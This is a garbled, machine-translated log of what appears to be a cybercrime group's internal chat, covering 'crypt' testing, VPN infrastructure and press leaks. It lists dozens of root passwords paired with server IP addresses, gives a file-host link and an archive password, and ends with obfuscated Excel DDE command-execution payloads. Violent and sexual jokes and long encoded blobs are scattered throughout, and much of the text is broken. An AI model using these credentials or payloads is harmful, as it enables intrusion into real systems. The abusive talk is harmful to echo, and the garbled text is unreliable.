3BVz8L0AbHiIQ2NCjCYRMPGdGpZ346AS6viByDAxL3tOL36A8xtu5H2WrGaMJe+KJc/iIJVXncI1kzMnl0kuL3iJz3x/BgofM65lYlXb3jadhU9AyFQA2+7CTwlX6EK9lsLI6Ut3iE2jQDL17lebpM1bCCD0w0zejmBP/23SDwVFo1aV3U9IedGcNAku5DDBX8C5irlWRWQ/KFTV6mlakF2XMijcMu7x7ytQzeTjzyA=="}ganesheyJhbGciOiJBzuP48kR+vZSd7+IZiucqASQvq/0sfgHyqbMo8ar/DQdgIlMEaSwShu8PayKANA9TQJ/lLJgUNG8dPfMK7l7Jzg0HZudpCULaHcBs/wlqX0ZJGZZGATqTmkHxGHVxZAKn4G839desxbQSilJ+UNMOOc9u5/NWHdbznDFb8LDr+A6S/Pln76ujlTO5ZJiHEfXbbqx0YIclTiyVCz//Bpxbbfy2e4gWy/e/TEn+mFJPpSgvkzPAFWxa0tlkTQhuel/V8PSInRB8y/o0ty7qv4ZWtlVRGv+UoVMxtH3dKyjT6snOGE9O7Y+C+OEFotnWCzAvx5yn1vHkjYRzqadIsRqJlR17N24Dq6eAyaJVz9HKnviXQUzYM4Bu0n2QU6iQj3An/iHoWqHOtDNzt9mULxd0QXkb3PceK6d1sA0aJkNrIFtyQd31BYz8BGLAnhb3JXBHANHEVOyMRK00U7GrX/BNWv9m/UC4fHhTePSqXk6TimY5CdJAKlxJmYPJk3gZxY1r1eHqulKtOrq/dTHh6wB85q4/nBxv/uAVl0AaInJaIn4 tenderness !How to direct such powerful energy in peaceful ways? It occurred to me ... On the old days I'll say nothing.And flooding today and there's almost no in comparison with the old days like alive, once only fell off, but it's a long time tired of flooding, for us it discharges badPah, and by the way, you still not tired of flooding? Guys! And what's wrong with the toad? threw the toad skin, turned maiden, hit the ground and pomorlaba something not very nu fuck, it breaks here)) by the will of the pike at my will - turn the toad into a fucking working granny in the first half of the day there were several sort of outlets, now seems to be working steadilyrazgorte of the day, and screwed everything (not onehodou me alone?fly out constantlyada is already smoking from the process-job-come on) wetrookov))) Sukhorukov will not lie work you rip her toad can not go And a positive mood)) good) your meeting - the catalyst for uncontrollable fludanu urgent need to call @redOgni! Demetrius, thanks for the cleanliness in #generaltomething this year, people are flying more than ever, especially kids - 200-hello, live? @angelo get a brain, not a junkie here, by the way, in my real life, above me lived a guy, last week jumped off the balcony ... i can't believe it, i'm not a drug addict here. by the way, my real-life boyfriend used to live over my balcony last week i jumped off the balcony. the coroners fucked my brains out, they wanted to see if i was spreading and why i had the music playing at night. good for you, let's roll memonics. i deleted messages once a day, but i had boobs. did the channel history get nullified?
root 94.140.113.53 0WcNDr7my3eaaQ2
root 213.59.119.198 123qweASDzxc
root 5.181.80.177 123qweASDzxc
root 185.99.132.121 fu@4(hb0TCUX45
root 5.39.63.103 123qweASDzxc
root 144.217.50.242 123qweASDzxc
root 142.11.237.178 MWZyqhZjhBc3
root 185.183.96.244 123qweASDzxc
root 185.163.45.95 zee7aig-oh*ҮHi!
disk -l theimage.img
Disk theimage.img: 111.79 GiB, 120034123776 bytes, 234441648 sectors
Units: sectors 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (min/max): 512 bytes / 512 bytes
Drive label type: dos
Disk ID: 0xb6b6f687

Device Boot Start End Sectors Size Identifier Type
theimage.img1 * 2048 78125055 78123008 37.3G 83 Linux
theimage.img2 78125056 195311615 117186560 55.9G 83 Linux
theimage.img3 195311616 205076479 9764864 4.7G 82 Linux swap / Solaris
theimage.img4 205076480 234440703 29364224 14G 83 Linux

``tablichu us sktny now decide:) Was 2048 78125055 78123008 37.3G became 2048 78125055 78123008 298Gnu and through dd and copied :) dd Or partitions need to recreate? how to clone disks with different sector size? 512 and 4096? for an hour otpcsp + testtipo plati_ru, kartzhennye akki? I downloaded from oofficialka, created a new account, cell phone does not need, from the left email to avoid bookmarks from the Chinese download from the left site, why do you need the MS?) no so download from rutreker broken, or from eBay, they also sell:rofl:no, I do not know the name, I know that there are, particularly popular are the aces to ea games are all sorts, but the software should beObraz a torrent key from ebayavito? I remember the guys once showed me a few years ago, the shop, it was possible keys to the Windows, studio aces, what you want and somehow cheap, about five bucks, or so.there is a whole site where all this crap is sold for next to nothing, you can always buy a bunch of keys and ask for an account ... I do not remember exactly, but I think just a microsoft account needs more and ask for a phone, probably incandescent these constant regikiosks with CDs "all for Web-design" already do not have)) there's a community of free distribution always, but what email entered so register, what's the problem?
https://visualstudio.microsoft.com/vs/older-downloads/
how do you download old versions of studio from ms (2012, for example)? my bundle-tor just stopped working on windows today. did it just fail that my rocket page won't load? does it show 500 with bridges? everything works for me. hihi all, does it work without vpn tor?eyJhbGciOiJBjWw6byns6gUJVmeNpTn53HMlYX36aBpYoOBAW6sTcBpxHhe6Ssv0kjIx5rP3LW3feMt3luTVS3xexeWlvovnC9bAfeojgGxjCm51K10dqf07vEKYRxR1O7zL3hACwsnbKb7uQyFPdpphWcE9M//okojuCeXjddHZiuUTADfnZzY02CjojNdKY8BckbbxNbCleyJhbGciOiJBH5hhhLNFVw9Vg3Z5kzG6rErckUAxAU3yfXdTDAiHVokkP4Mdz/rtJe8h+TFawFOYgHlRKjpfG1OTvnUvHd/PCSPG6+9X9bnbU1ygSFMwUhTNgIpo+o6qeGN5mAZezXnf7x8Ny6+QphEWQVGfZnPqnxsPwfnvGcMlX+lJbYexCZgOsf/KAGF1btpngzZdY3Xt1V26j/9r9pJUWQehTUOR86Prx5OwarhehCu9m/fV1+vgqoYK5XAZmQIyySOMcZ16Ts2a9rh+tUfi/SVL9uM9/nSEHiT0L948JD3KUtC1fjU04ZqAjB2tzUuRA8Qj94ueHwyo47+tWr0Wb6i2lL9I9myHDlLqfWoXPcnbozRPS7Cs27Qk4HQR6wjNwOT+UMu6vkT0lVSnbAhcNBXipSVzQ0BG412JzWMVJRW6uq9lN9Dkx4MmNyfszPd4zztNSxHce1Z9eYK7AfMxULWzNy7QF+74w6V5aLE3tTLS5yrnsjIU/yV2A7MTDZ0S2YHkVXClYRva+BYzVIYna707k73A3TmQEZ2PRzc4YJQO3cLLNTB3K3jsCoD+0xUdXhKh6LgS4WFoMtYMMMaipVshwp38J68fC3wP4KgZugKNvYpTcUUr4hXQbhZtbQ76XgFiIrLFrJeHARh7wtYnGG/oKkRBRXST9nJ5+dn+JFVo5JHhRv6rrIWfWfX6TSjQL0GXlDzBtVAtnaWQp/7ZBZQjnFdW99rjy2TUyrYeyT6kXJwr+o7r95orJoNFSdReGE5Bc5YNxiwLzVd6yCcFvMrKH+qW4N+BH17ynCAJNkxdTcFo oops!hi! did you see? root 89.41.182.21 1pOgCGBr82ku1PmS03 RO
root 172.83.155.132 34fhjdgEN3rE5ff USA
root 45.95.186.118 o380kHu9S8xX4mNQPj USA
root 194.15.112.173 34fhjdgEN3rE5ff EU
root 51.89.128.193 34fhjdgEN3rE5ff FR
root 49.12.220.45 hTq9jm9wTaPFCwKF9iXg USA
root 91.92.109.180 34fhjdgEN3rE5ff BG
root 192.99.255.47 34fhjdgEN3rE5ff UK
root 64.44.139.41 34fhjdgEN3rE5ff USA
root 194.36.188.24 3Dfbvcdertgh NLpriot 74.119.217.58 34fhjdgEN3rE5ff USA
root 85.237.217.157 34fhjdgEN3rE5ff NL
root 185.163.45.17 aeY@oh7iek9u MD
root 94.140.112.139 dDSMG5MmWiKqxDx LV
root 213.59.119.150 34fhjdgEN3rE5ff USA
root 194.135.33.12 34fhjdgEN3rE5ff USA
root 185.99.133.137 wmf8*8u4:RFH5O New Zealand
root 107.173.81.96 s3j97RF6ry52ndGNJU USA
root 194.15.112.174 34fhjdgEN3rE5ff EU
root 51.89.128.195 34fhjdgEN3rE5ff FR
root 49.12.209.156 7TFJuHcnpCe9rKemxbu USA
root 87.120.254.213 34fhjdgEN3rE5ff BG
root 23.254.201.112 ZckC5589GaJ4JjHnkc USA
root 64.44.139.45 34fhjdgEN3rE5ff USApolodite)bum detector updatbeiss fresh air, physical activity, pay well):rofl:to work as a bookmarker went? maybe someone remember the address verif, also in ls who remembers the address of Hydra - throw in the lie of course Kotik!)))))) i am your friend also hydra friend asks you to give the address of our store something i do not remember exactly on gta and i do not remember the exact picture levitan "elephants stomped away" picture fucka here came to you to piss in gta 3 tok were tanks)) and you do it from a helicopter or on a tank crush it not?In gta3 it was in the mission vidzhilantes bazooka get out of the limousine even give them:Dak I met such meta now bums will be given money in Ruglavnoe with a bazooka not to run into anyone there on the bums - the main thing is not to run into a bum with a shotgun fence through and on the fly in 12-14 too did fun, The Russian Criminal Code doesn't work with kids. There was armature instead of a bolt. I'll say nothing about crossbows from a spring. I was bored. The buggers would go to the Red Brigades by 12, that the whole village was fucked up, then they put nuts and the like after the wadding, thick wadding, a couple of packs of gunpowder, they heated it on one end, they took the pipe away from hunger when he was a cunt. Can I tell you what my grandfather did in the fifties?i won't tell you what we were doing :D and not the ssannina we're doing now) when it was still OK and when we had hot-smoked bream in our youth... that's not what we were like in our youth... at least we didn't rape a man, that's a fact. teenagers are bad - it's funny and not funny at the same time.You just had to see and hear it in words. We hit him in the jaw with a whirligig, he farted a lot while he was falling down. Of course he was blue. One of us was a karate guy, some Tamon came up to us. Seeing him wake up and the horse slept there. We went pissing in the bushes. I remember a homeless guy fucked with us. He was really good at it. He throws a stone at a bird and after a couple of seconds it's already in his bag. )) In respect of the Bart can apply blackmail)) everything grows from season to season, but does not grow nikuyya ba his son bart threw, but he had enough, sorry him, but the theory and the norm itself is running away at the time "bum, I choose you "If any problemsolovite bums in pokeball and will zbsDlia ordinary people do not. The uk has not been abolished, just like shish kebab in the soviet Union. Haven't they abolished the uk yet? Sure)) We'll soak them in vinegar. Meat is bad))) The homeless are not eternal if so will continue, we will have to catch someone else, I'm already beginning to catch the homeless on the districtetam Franz a couple of days ago wrote about zp and geet. I do not understand what he means guys and zp is delayed again this month? björn straustrup approve me this xor^C^ evil^^=pong:ping_pong:-+pongpingwhere the dosimeter goes off the scale, you can't go wrong if only the person was vaccinated or by 5g, where the signal is stronger, there is a cluster by chips to find the remains?I'll fly to me and go straight to the oven, I thought I'd take them out of the freeze, bros@angelo, do you have any pigeons left there?morf2/3/4, phobos, deimos people are using -- have already picked them upThat's how we live...you can forget why you cameTo go to the bar. get drunk, forget that he is an IT guy and then actTo not lure, just kill and all write on the WAP to Ruben in private...demos is not flyingMos normobos normne on daemos...on phobosAn answer from 5.255.255.5: number bytes=32 time=57ms TTL=243
Response from 5.255.255.5: number of bytes=32 time=50ms TTL=243
Answer from 5.255.255.5: number of bytes=32 time=59ms TTL=243
reply from 5.255.255.5: number of bytes=32 time=51ms TTL=243+pingbenny let everyone write me in private, if anything there is #announcements in spam in general chat all will be lost[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=0000FB382CA9FFFF) I think you need to make some chat for such important things there is for example annoucemenst@all Please do not litter the ether, Ruben asked an important question, is an audit of systems, check corp vpn!I don't need to tell you anything, we'll die of hunger if I knew[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=NhCGdXGzRZsCQdd2e) tell me the secret, what's the phrasemanok need, like a duck, but with the appropriate phrases. Does anybody use VPNs deimos, morf2, morf3? How to lure a girl home? Checking to see which ones aren't being used. We shut them down and we're waiting for someone to complain. If anyone does not have a working VPN, write to me, I'll turn it back on.hi ally girlie thighs in teriyaki sauce and with nuts - tastier! angelo already cooking with pigeons and bums) Frances did not run?):Dmda horns and hooves will have to get themselves a linden honey ...I was thinking about Merkel, I was dreaming about it. Oh yes, I like it on top. Well, just on top, so that it has a crusty crust, I thought you should grease it with mayonnaise.oh times, oh likes us, we're specialists, we'll fuck a woman, and then we'll do the rest in a circle for the eveningNo, don't touch them, they're for meat, when the pigeons and bums are done...ok, I'll put the scotch back No, they will sleep later, tonight...can I fuck the girls while they sleep?)) I mean boy? I'm in the 5th What 6th office? The office will be cleaned up later. Bones from homeless people, feathers...no, better not, you can catch bird flu from them. If you come closer, I'll break your arm. I haven't had angels for breakfast, they say it helps against all kinds of omicrons. I should have just refreshed the page. Does it work for everyone? You could also make noodles. Why boil pigeons? You can just eat them raw! The older the meat, the worse it is. So the angels in general in fact rubber or have to cook half a year they are probably very tough.I - angel want to try..... have you tried it?.And people taste good?.I want to try Wombat and DolphinNow that sauces, and here the banal boiling in salted waterNo chicken. That's for sure. I tried it in Paris. Chinese people. They put everything in the sauce there.... And I've had frogs... Speaking of pigeons, I've tasted them, it's like chicken. Only there's almost nothing to chew after eating pigeons. I'll clean my desk of feathers, do not worry@ruby do not fall down the office I'm in the office the fourth day and there are many of us, left of my desk someone is finishing a homeless man, right with the pigeon is being dealt with)))))
Answer from 5.255.255.5: number of bytes=32 time=50ms TTL=243
Answer from 5.255.255.5: number of bytes=32 time=59ms TTL=243
Response from 5.255.255.5: number of bytes=32 time=51ms TTL=243meilu agent, you were fucking awesome) compile with all components switch to another operator who can analyze your logs and make your connection betterrjvgbkmnt cj dctvb rjvgjtynfvb tech support Tor tell me will Tor always be like this now ?wild connectionThis only applies to machines on the farm.i think it applies to those who have their machines on the farmTo only those on the farm or everyone needs to fix the configuration ? Who's testing our crypts on the farm please contact @gator
We need to get your machines configured.
@all
It's relevant! The question was raised and immediately closed - that's the main thing, and these Dlls have nothing to do with us anyway where to talk about our underpants Elgo, I understand that should not, thanks for the information Remove from machines these libraries do not need, on the contrary good that they are not there - it is immediately visible that there are dependencies on non-standard libsThat should not be ...Specialists know better) well, the system for the first time dokupomplete, to start the bot)) False) well, as he explained `dll not found - mfc140, probably. The OS is not installed properly. Copy these dll can be from another machine.`for the purpose of the library owner for our software will not put....@dane should be with /MT build cryptsThat should not be.today dane crypts dumped, there allert at start up flashed due to lack of vcruntime140.dll and mfc140.dll this magic I mean)) Do not know what magic) dll you mean to put in system32 and sysWOW64 ?To all testers attention! Who's testing our crypts on the farm, email @gator
We need to correct the configuration of your machines.
@alalMy messages are being written to, but my messages are hanging...Some kind of freaky failure was with the connection not let that bot !or maybe they are ignoring me :face_with_monocle:yes it's obvious that otr is trying to update, but the contact after about 5-7 minutes still off@brent not seen the outlet in the toad for a long time, or he appeared by evening@Garfield aha, so, usually already otr not updated or do not want to communicate with me :triumph:can be sort of online, in fact there fly out yet? you write them when they are already on off? doctor ignore me! - Nextpisuya emptiness is not the first person about the messages - I can not say exactlyokovyletnyh happenzametil that people fly out of the zhaba often and do not see the message occurs danaya bug at you?King-cong) pongpingU Amazon in the agreements prescribed case of zombie apocalypse or starterik remake as in my childhood )yes, long time need to take Saiga[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Ktis2zHj8cpwDYtnx) also think, no weapons or stew no ...(It's like, mountains of corpses (decomposing) cause the formation and spread of many diseases and other viruses, bacteria ...
But here everything is civilized, there is a small line, the morgues are full. Everything is civilized, turn by turn, and at the same time to the fullest. Someone is gently cleansing the planet. )How not to blow the zombie apocalypse, to buy stewed meat Zombies are a thing of the past) I can already see zombies in the street If money is invested, then only in this industry) So there is no time to bury, in the morgues, the line reaches 7 days Where are the mountains of corpses? )I sneeze in the morning and cool in the evening )Captain Trip )I want it to be like in Opposition )It's not seriousPandemic is a disease for followers of the WHO)Lucky people, they never cheer for pandemics. jabber plzjabber plz This is not 55+k to buy)) Let them ban it - it's easier to pay back) @rags, you fucking found the guilty ones What's the noise and no fighting?Yes, now it's clear that the Tupino government is in cahoots with the americans and follows all their orders.They did not store cryptocurrency on the blockchain.com wallet like suckers. Cryptocurrency is likely to be banned, up to and including criminal prosecution, but thanks to who? Revil thank those guys who were smart enough to withdraw money and store it in a warehouse in their apartment, and now we have another headache to withdraw our money in real. Bystrykin sat down and thought, "Well, I think it's the delitans, but there are non-elitans, and I think he's afraid to imagine what it's like. =):metal::vulcan:+++)I'm therehi all@all hello everybody, ♪ who's up for it, write in person on ♪ зпeyJhbGciOiJBJvqTceFqcMlO4ZbACu/VztaW14WMu7/72inNa/VL6DjwB+RQOXEOjXJiMEHUxmjCZHBmxgJnhjrfzOj2um2wkIaHh4LGwvHkth19QrddzKI9U44R274YGpBx9hBcChfGbNPFBnO9Nn4he8Wu9NqduIszE9sKLumga0cAB5cmfAU=eyJhbGciOiJBu2rm5RAgB8ySnl1lBNzqE1WfhvuY7oqBK469erv8Ce5H/8T4NyptoJTJVloVHy+VNSCSdwhTUEcuabzd5StCFK7hG1Sttgp8cM/RwfmW1xNEAYIFRL0GoX8fTwUSqH9wqvjPfntZsq+TUq8dwKwIxr0C7EnN3dpj2CLWUdM4sNlBnJnJciysCnApLn8MQvgieyJhbGciOiJBKFh5oMjySDzx8YVRDKP6NePWywbGh0qQmre+lMQVZU/ou+wdPFY3F/6fHYBFnH/898rXIsm5v4YIIy9tZ/lTXqEkCdmQPO7z2KjXpvcQpDjWm2T7lal30p09odzP1Mb+iNX0zEOz9KqN9WYpZ507yDAH1YAVFXSLj6PfLBWqrrHMCwEWdTzEiENPosymhfaluK8ODExfZIcTWV8VODJ0Z3Fh34uRTyhbYcmWuwPs8WlwqzVrhdZTHRscER5WUD5vbq2OQxMAiLHjL3lkOZQQeHlNICd+4BdDD2TydASMa0VuHWP3L3nm/HPGRn/FCVJweyJhbGciOiJBQq4NsTE3DVEh6w67SirGPvTEn/F5qNTIqd0LmTXZvcq4LAz2llzaG0nKqjJmE/BgDCmsWoGkMY+J/G3XxP3lYqiMJJ83YdYUrdzEzvEokhKfdxgEOxAxni2Gi3tp4suekmD3kVohJrMHy+Flo+Lajpwcp8ZTfxAWRI425u6sNpZlSgvEYT03yEOOpBKq7fSAy9DK7lPu0DlxVXAI/vPRGftig3TBItW54LrwGg8QDRvdAluG89Et8uk6f971YJmLTfvjvnSuwa1FnLv4NCLCqw==eyJhbGci correctly says
You need a secure PHP for 5-10$ and deploy https://www.wireguard.com/мне. If you want it to work, just deploy autoinstall scripts in one click, then get a public one, something with a good reputation. the only way to get a secure connection is to download and configure your own pgotonvrn worked, stoppedpodkit some cheap (or better free)) vpn, google search gives the same thing, only with regoynikakono says I am not 18 years old how to watch without registering at google?
https://www.youtube.com/watch?v=nhVs22Fkakw
```
repeat for @angelo[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=bt99Hqwbe4gHMTRok) right you say) so i wrote that i meant vt-x, i made a mistake in the expression i did not notice that, and hyper-v happens, they write it instead of vt-x in the bios? it's like a story about how one developer of "russian" servers put a hypervisor with virtualization in his uefi and sold many such servers to 3 letter organization
It was funny when they found out that they cannot run guest OS on these servers.
i meant virtualization it is enabled in the venda and the virtualbox supports it too hop-v is a venda virtualization interface in uefi enabled not hyper-v, and VT-x and VT-da need to run a sandbox on a virtual machine as it is not easy depending on what kind of virtual box you have and what guests
you don't need vt-d technology for SLAT ?
i googled, not all vt-x processors have EPT. yes, i have virtualboxes, without it they would not start in uefi enabled hyper-v? what kind of CPU? if i'm not mistaken all of these virtualization plushies should be supported by the processor itself vinda writes You do not have SLAT (Second Level Address Translation) why?I enabled Hyper-V but still can't get it to check the box СендбоксеeyJhbGciOiJBiNo9MgWHmzqio8BmfxiVYwRuPVTeafr6sjjSJLQDDAUmuwINwzYWDVhADIHzERItXMgv/s5bAtLvjoYwt4AgMzzte8YEZHLMgR6wzVsY/pLuYx41a6o/DaiYnptIqBvTsPDpl86rpqd6ecr06Uf4xaL/DbGms8lBxomxolZxv9I=eyJhbGciOiJBC940GJsTOVhqaiYk55hDwxb8MGwUve/RoGyAD0PUeCKBRnw5n7YHYgnGyLYEcSyAXARbQxfmFd+44GFS5Tu29I+/tICkhakIsQh4vtuZZfr6Fr4fnJsD4CwgF2mNndj3hX1MIs/aEcrUAHgpAXaDStimRM1kxwRBV9pMmAhnhi2gbhzSa8fVGhE3zIsiBmqSeyJhbGciOiJBPFK+OOLQGhRy3uWShgJTPMyBa/QZEdp48OhMIZoAltba1LpRmqMctyxsywuQaKpS5VYVhsJA/sOSusPrFQ0QKTO7qAhHkNJBp5K3MA9i+wGZGnfJFCPaDYPo7hEwJrf+7jn6BcS04By0QVFUNgBvhxAZdSQC443mOp5v1DjWGCsx90w1ORQlzp9Wc23ET+VdRiQdYtYHUPXIymr36KxrRg==eyJhbGciOiJBppWQVUDSpD5EVIE6u7TMTNYRDQqK+MxblehSAqEee6fXt7runCMfx1tcKqo7TAUN+La1USXx2xRLrER6b+hqAj0m93FhIC3nQNEPVjh2vN67w3GMdYzcc4nL0ZWURaSKS995Qtgo5xD8YtG+ugXwjqtpmnkbyTAAsZ/yk4CP61/ZnwFvTl/k1IT16U3fq43Lp64KYJ+cVAYWHFK5bjcKHg==eyJhbGciOiJBtRvVmZoaxbC72lRRzV/rxvtwOCfY0dD2XgyK5gTP9igwyNL9coVpmduwfSmeT22s5GbMGHCCvHFjfK0Va+WEFXCEB6xJlPcLCMkaYpFfmqYTsxCNj9IEm3HXXexH4H/dnRb8F36ltMSnqGm1J2xIdg To the 3DfbvcdertghDownload archive itself: https://qaz.im/load/z2snKh/hEG76A
Delete: https://qaz.im/index.php?a=delete&q=199378600
Password: nAK7Tefa733ysiyQ2B4trZ7RZsDbGbkYDZSh52h2Q8h6My work account ran out of creditsprivet@demetrius check the rocket settings, maybe users can share access to delete their messages to erase all at once. It is sad, if only by deleting one by one this process will be implemented tcp2hackers_conversation. I wonder how they technically implemented surveillance? Looks like a complex that worked to capture unencrypted traffic.
The conversations among the group viewed by WIRED reveal at least two members appear to be based in Belarus-during the summer of 2020 when Belarus shut down the internet Stern said that one member, a coder called Hof, would not be online until "the internet problem in Belarus is solved."
The ``Belarusians are busted.
The messages were sent in the months before and shortly after
``thx
https://www.wired.com/story/trickbot-malware-group-internal-messages/
``Where did the firewalls come from? etc.``(git) people had access to the infrastructure like that before the shutdown of the trikbotgorbachev.jpg)
On August 20, 2020, the chat logs-provided by a cybersecurity source with knowledge of the group-showing Target briefing Stern on how the group would expand in the coming weeks.
```

no otgswetlaks.jpgdok long time ago such thing is on sale alreadyooooo :point_up:and every average person at once will say "oooo... "write more such in the press release, cubit processor... Quantum processor with QLED-monitor) ok, got it
cube just there are no screenshots there, jast may think that almost always the insider is a leak, but not some "super-technology, the drone company Virgin decrypted the correspondence of evil Novgorod hackers with their branch in the office of Satan using a neurocomputer on a 648-bit quantum processor "and where are the screenshots there? no, if this is a real screen leak, will be again many general phrases and a few details designed to emphasize the plausibility.and then dump it, or how to up a bit before drinking as they laughed from the hungry workers in the next plum info will know how the bosses are discussing how not to give zpa to rabble pigeons will have toada then call it, do not call it no)) F? thought to call someone yahoo) ktulhu almost called all a bit on edge, just kidding, bro you answer @patrick in the thread. i don't want to jerk off) i'd rather let them jerk off and get it over with. guys, stop. the joke was on Kerr)) you made that up. i didn't say that. But to skip jokes that I suck myself, I'm not ready either)Elliot, even I'm used to communication Kered I'm not negative at all, you reacted in a way I think you should not)I boiled? when watching tubicata too easily boiled in a conversation where there are over a hundred people. It's like if you shouted at a wedding and a guest from the bride's side responded to you. You didn't seem to ask him, but it's a common room and you shouted, not whispered in the ear of the mate.  Don't flare up about anything, whether I responded or not, someone said something, group for all, don't like my response, ignore it like most did, no one will notice anything. ) I caught the kernelpanic 2 times in a row@all with someone suddenly restarts the mac? or even turn it off for users about tits pussy, etc. Let it be betterhere are often highly specialized questions begin to solve. need to stop this practicekei-then forget it) do not understand) it is not about identity, and in participantsha conversation in general, I emphasize, chat, belongs to you personally and the subscriber, or all?When the general chat becomes private, then I'll gladly listen to your reprimand for what he wrote in it.I'm saying that our society is impersonal enough to feel seemingly independent from one another, yet we're human, and some of us are even friends with someone, and some of us just talk to strangers without thinking, and there are those who fuck off, oddly enough, there are people here who can tell me "fuck you" guys, guys there's not enough to fuck up. Did you ever notice the difference between "fuck you" to your best friend and a passerby?I don't know what the fuck your relationship is with each other, I don't think I've picked on you at all, but if I have to, I may have rested on the cross, his daddy was a big shot, and he blabbed how much iq do you have as citizens or kuarkods?it means that such a person has a fucking back and press lolvot why eliot wouldn't jerk off even applaud that IT guy who could give himself a blowjob read even me. reading in and of itself is not a waste of time Kermit you know who?! krabs? he's still hunting for a recipe? he was reading on the subject - how to give yourself a blowjob not salt Krebs :/:rofl:not to snatch in the fuck, agreed he kind of practiced in this question or at least be flexible as KermitTo come in a vagina must reach the right levilkonchat need vaginas !but i agree, it doesn't change the point)) pickupmasterone like i don't jerk off, i don't fucking throw my tissues out of the car eliot like he's not an i.T. guy?and the dough is stolen when my subscription to pornohub expires, and the wankers do exactly the same thing that the local pentagonists don't like!and in between porn sites they deface the pentagonping it's just that all your IT people avoid people, sit in the dark and pimple, eat doshis and jam, jerk off without getting up from their chair and spread napkins around the place. the rest I'll leave to Kermit if I remember correctly the canon. then fucking geese is to rob and kill first) oh what a bird, what will we do with it?! First we'll eat and then we'll fuck! -Geese or pigeons, so take a pigeon and go to the chicks, chicks love them, even simple communication is mutually beneficial, although the benefits are not material... Kermit, you're right, the eyes are burning, for a bowl of soup you her... i don't know any relationship except the market, normal, whatever he is hungry for, it's for money!babi hungry student give and still as it dai babi again do not give pigeons to eat@patrick I liked to watch on the big screen about space bomzhi et moezp was not, and judging by the black circle at Franz, will not)I think this rule applies not only therezp was or on the homeless switch?) do not want to say anything, my personal opinion. From the words of the most common policemen, 90% of the information is slivangelo, there are mostly classics, no porn, kids around, onyon-servac at the same time made you screenshots will not show:joy:but the nicknames show that someone's screen was leaked this way it usually looks like "i heard something but i don't know fuck all about it but i need to make it look important" they just need to change the servers and it all says i dont know what organization is mentioned there, some nicknames, some kind of general words@elliott bosses leak other bosses. if there's something you haven't watched yet from cooltogoda, projector, downloaded from rutrecker 400+ movies if i know anything about such things, such information leaks first, there is little information, but a lot of fog and images of omniscience, second, the most common way to get such insiders is to monitor someone from the inside....lolpryshaya assholes in 4kPornohubThe Big Bang TheoryClinic no movies what to watch on it? projector made? finished home theater on the Malinka 4, diagonal 100 inches, consult for free)), contact as always, no protection from the fool
I know a guy who leaked the password from Citibank for 100 bucks to one idiot, who fell into an elementary trap, the human factor, yesvery business, absolutely everything ruins the human factor. I wonder where the fuck they get their keys from,
They sit down to write, and after a while they find a zerodei, and quickly use them. As I wrote, I believe this is true.
There were holes in the rocket, by the way.
Well, and mice, yes, no one canceled. Only they always miss the point of crisun in the team and agent, you can write a lot of things, but how exactly they only know. and the fact that we here think that they have a mega there nabobotka bullshit there, somewhere fools just punctured and only now will understand. but why write an article if they were not taken that so hard to zadeanonit with the keys in hand and all the traffic? i don't believe it)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=mCBHYDWiZ3C9JmsYo) paris is worth the masses, with pipelines sorry they didn't get to the collapse link above@frances saw the trauma route on sadoviykontora writes)i guess they sit for a while recording https traffic, encrypted, then they fuck up the keys and quietly decrypt everything. You don't work without a warrant, you put links to files on public resourses... It's all pouring out... Judging by the info, there was a hijacking of the toad... I'm telling you, less information in public channels...
it does not work that waytoo much toadservac in general a long time ago to change or teleguetatak leaked toads, i guess i'll go to greh. shit you should thank me for the dicks ! that's what i say, write less information in public channels ...yes, u.s.a.
don't bullshit, just wait.

Kermit, I read your Russophobic speech, I'm sorry, I won't treat it, your right

The pindostan has destroyed too many countries, including my homeland, to forgive it.
https://www.securitylab.ru/news/529411.php
You should rename Voronezh to Carthage, and what is Carthage? Let's wait and see.

If this is the hysteria of the pindos right now

Carthage must be destroyed, it is up to everyone's throat, their hands are up to their necks in blood for 30 yearsnadoado bomb Voronezhblin, Kermit, it was taken right off the tongue, especially the citizens of Russia will not feel sorry for themselves, lolkreml will respond after the Olympics, no one will feel sorry for themselves, so i think it can still go down to 36600ada i actually just looked at the platform, ok, i'll see what i had a glitch temporarily, the tor browser itself)) basically no difference, just started with bold text highlighted applause )) plain text, no fat and italics_and before how was it?)_yeah it's the browser seems to have glitched it's not me I can skype a screenshot, everyone in the chat has bold nicknames with no spaces *there *for example *but it's for text only. the nicks aren't getting fatter, they're starving... what's the matter with you?)and it's not a threat at all * everybody get up* thanks, friends, thanks, we'll be back again we've torn the guitar, we've broken the drums * stormy applause turning into ovation*)) clap the band Cybernetics-amateurs finished their performance man and cat will accept the powder better with money the snow white color makes the soul sing the powder is wonderful, it brings people luck ** doctor will come, will come, will go
through the snowy plainwhat's up with the zp, didn't they bring it up? man, that would be an impressive number of course, but no net from below? the neighbors haven't flown by yet, who are upstairs one and the same static space what can you see out the window?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=SHcieibRSmKezegkj) are you deanning without a finger of your pinky foot with the door with laziness we fight our own war, stop it[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid)onion/channel/general?msg=3AvbE6HaHAQCvdnRc) well here veldon suggested that you go to warIn Ukraine or in Ukraine?Yes I understand, everyone wants the WP, and any method is good )guys, we have a working correspondence or in a closed channel or via LS I bought boots, I'll get to Fashington)
you send me the salary,
I'll tell you if you need a macro that runs the file, I can give it to you, but there's 809datThere's also a security warning that excel will probably give out before launching, asking "include links yes/no" The first one doesn't work that doesn't have ^ and "@ryan "Excel will run a calculator with a notepad".
doesn't workRuby, if you need to obfuscate it, you can write a bunch of ^ and " characters inside the command line
For example, like this:

```
DDE ("cmd";"/C c^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^alc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C c"""""""""""""""""""""""""""""""""""""""""alc'!A0
